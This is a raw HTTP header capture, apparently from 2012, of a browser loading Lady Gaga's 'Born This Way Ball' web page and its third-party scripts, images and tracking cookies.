Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:17 GMT
Etag: 35ae6191644b888dabe69146781fda26
Vary: Accept-Encoding
X-Trans-Id: txec26333a363a44479e11d4445606df9b
X-Timestamp: 1349707037.75438
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 27 Sep 2012 16:57:21 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 4413
Cache-Control: public, max-age=263
Expires: Tue, 06 Nov 2012 16:48:43 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /widgets.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:09 GMT
Etag: &quot;eeaccca8778f3be533564253af185e3e&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 24565
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /web_assets/_global/js/echo/plugins/social-sharing.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Sat, 17 Sep 2011 06:20:02 GMT
Accept-Ranges: bytes
Etag: &quot;74abadd5175cc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1978
Vary: Accept-Encoding
Cache-Control: private, max-age=47899
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/UpdateSort/UpdateSort.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:09 GMT
Etag: c2574a22c6c05a03439a60553579ce5d
Vary: Accept-Encoding
X-Trans-Id: tx3113236d299e4c14aa856e32c42dfc89
X-Timestamp: 1349706969.20250
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 08 Feb 2012 22:48:31 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 920
Cache-Control: public, max-age=453
Expires: Tue, 06 Nov 2012 16:51:53 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/regex.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:01 GMT
Accept-Ranges: bytes
Etag: &quot;3f40dc8b80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 748
Vary: Accept-Encoding
Cache-Control: private, max-age=11423
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/janrain-sharing.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 09 Oct 2012 20:08:53 GMT
Etag: 9ced29d8008d303ccc1d061a55af072b
Vary: Accept-Encoding
X-Timestamp: 1349813333.73462
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Tue, 09 Oct 2012 19:52:40 GMT
Accept-Ranges: bytes
X-Trans-Id: tx0184fd601d784071a6c3007b1dae9792
Content-Encoding: gzip
Content-Length: 3774
Cache-Control: public, max-age=537
Expires: Tue, 06 Nov 2012 16:53:17 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/rssfeed/rssfeed.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:16 GMT
Etag: d4066fbbc47a910e4627d6a348a844c5
Vary: Accept-Encoding
X-Trans-Id: tx6161a360f1064eb0934b081334a78ad4
X-Timestamp: 1349706976.17651
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 16 May 2012 16:57:43 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 903
Cache-Control: public, max-age=843
Expires: Tue, 06 Nov 2012 16:58:23 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/sort-order.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:02 GMT
Accept-Ranges: bytes
Etag: &quot;f8c57e8c80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 884
Vary: Accept-Encoding
Cache-Control: private, max-age=11707
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/permalink-retag.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:41:43 GMT
Accept-Ranges: bytes
Etag: &quot;9fb0d95e86bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 501
Vary: Accept-Encoding
Cache-Control: private, max-age=47997
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/strip-html.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 26 Jun 2012 17:44:19 GMT
Accept-Ranges: bytes
Etag: &quot;10d98750c353cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 630
Vary: Accept-Encoding
Cache-Control: private, max-age=48139
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/ucid-login.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 21 Dec 2011 02:59:15 GMT
Accept-Ranges: bytes
Etag: &quot;fd2779868cbfcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 606
Vary: Accept-Encoding
Cache-Control: private, max-age=10060
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/youtube-wmode.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 18 May 2012 18:06:06 GMT
Accept-Ranges: bytes
Etag: &quot;bace63e52035cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 476
Vary: Accept-Encoding
Cache-Control: private, max-age=47536
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/sanitize.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:15 GMT
Etag: 027cafdc601111c681a84998aff7dd1c
Vary: Accept-Encoding
X-Timestamp: 1349706975.43264
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Sat, 15 Sep 2012 15:07:32 GMT
Accept-Ranges: bytes
X-Trans-Id: txde9cc043463046b880f52d81000c7c7f
Content-Encoding: gzip
Content-Length: 1682
Cache-Control: public, max-age=626
Expires: Tue, 06 Nov 2012 16:54:46 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/switch-arktan-image.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 18:24:05 GMT
Accept-Ranges: bytes
Etag: &quot;d741b11982a5cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1998
Vary: Accept-Encoding
Cache-Control: private, max-age=70123
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/echo_comment_localization.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 20 Dec 2011 21:59:26 GMT
Accept-Ranges: bytes
Etag: &quot;f6b820a462bfcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1273
Vary: Accept-Encoding
Cache-Control: private, max-age=81214
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/LMKSubscription/LMKSubscription.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:15 GMT
Etag: a6af50b1ec19dd8d274e6e92f5cce645
Vary: Accept-Encoding
X-Trans-Id: txedcadf60c444401db3e518a816673a00
X-Timestamp: 1349707035.33234
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 18 Jul 2012 21:41:45 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 3681
Cache-Control: public, max-age=401
Expires: Tue, 06 Nov 2012 16:51:01 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/comments/edit.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:39:56 GMT
Etag: 98a5cfe14f4210a1394cc96b00cc5847
Vary: Accept-Encoding
X-Timestamp: 1349707196.00669
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 29 Jul 2011 18:08:19 GMT
Accept-Ranges: bytes
X-Trans-Id: tx75e3792e2d8947d88a3b99e3e9ad5b3f
Content-Encoding: gzip
Content-Length: 1492
Cache-Control: public, max-age=660
Expires: Tue, 06 Nov 2012 16:55:20 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/comments/locale/en.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:39:47 GMT
Etag: c5a3cd2475169ac7d7d9001b8ff6e592
Vary: Accept-Encoding
X-Trans-Id: tx851d5b101ea64ddda5091179b610a0f6
X-Timestamp: 1349707187.19912
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 17 Aug 2012 14:39:51 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 1461
Cache-Control: public, max-age=759
Expires: Tue, 06 Nov 2012 16:56:59 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/comments/comments_core.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Thu, 18 Oct 2012 15:06:46 GMT
Etag: 147654c56478384a7094c5cd9ec6de98
Vary: Accept-Encoding
X-Timestamp: 1350572806.00980
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 18 Oct 2012 15:06:26 GMT
Accept-Ranges: bytes
X-Trans-Id: tx1fbcdb88d7e9459298d9fb9a2b8e6299
Content-Encoding: gzip
Content-Length: 12370
Cache-Control: public, max-age=632
Expires: Tue, 06 Nov 2012 16:54:52 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Etag: &quot;9717c3c907d253191939bf5928941e07&quot;
Expires: Tue, 06 Nov 2012 16:44:20 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Cache-Control: private, max-age=1800
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /_global/images/ucid/sso_social_icons.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 15 Dec 2011 00:48:31 GMT
Accept-Ranges: bytes
Etag: &quot;8019d44c3bacc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2517
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /_global/images/ucid/ajax-loader.gif HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Fri, 16 Sep 2011 01:05:18 GMT
Accept-Ranges: bytes
Etag: &quot;9bb075b3c74cc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2892
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /bornthiswayball/images/monsterpit.jpg HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Thu, 16 Feb 2012 23:34:56 GMT
Accept-Ranges: bytes
Etag: &quot;090f1963edcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 7777
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/shadowbox.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;aafc48b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 7680
Vary: Accept-Encoding
Cache-Control: private, max-age=569
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shared.min.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:01 GMT
Accept-Ranges: bytes
Etag: &quot;c4be6f8a262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 5755
Vary: Accept-Encoding
Cache-Control: private, max-age=536
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /libs/v1/notifications/notifications.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:00 GMT
Etag: 3a452158facfc29c920a7c14752c505a
Vary: Accept-Encoding
X-Timestamp: 1349707020.89797
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 07 May 2012 17:31:22 GMT
Accept-Ranges: bytes
X-Trans-Id: tx7da5e23733734615ab6dbdc7770bf03f
Content-Encoding: gzip
Content-Length: 9786
Cache-Control: public, max-age=150
Expires: Tue, 06 Nov 2012 16:46:50 GMT
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /clientapps/v2/packs/full-no-jquery-pack.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31711
Date: Tue, 06 Nov 2012 16:44:20 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:09 GMT
Expires: Wed, 07 Nov 2012 07:55:49 GMT
Content-Length: 100461
Connection: keep-alive
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a20+AM; path=/
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a18+AM
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
GET /widget.js?v3 HTTP/1.1

Host: fanrx.universalmusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Age: 13097
Cache-Control: max-age=14400
Date: Tue, 06 Nov 2012 16:44:20 GMT
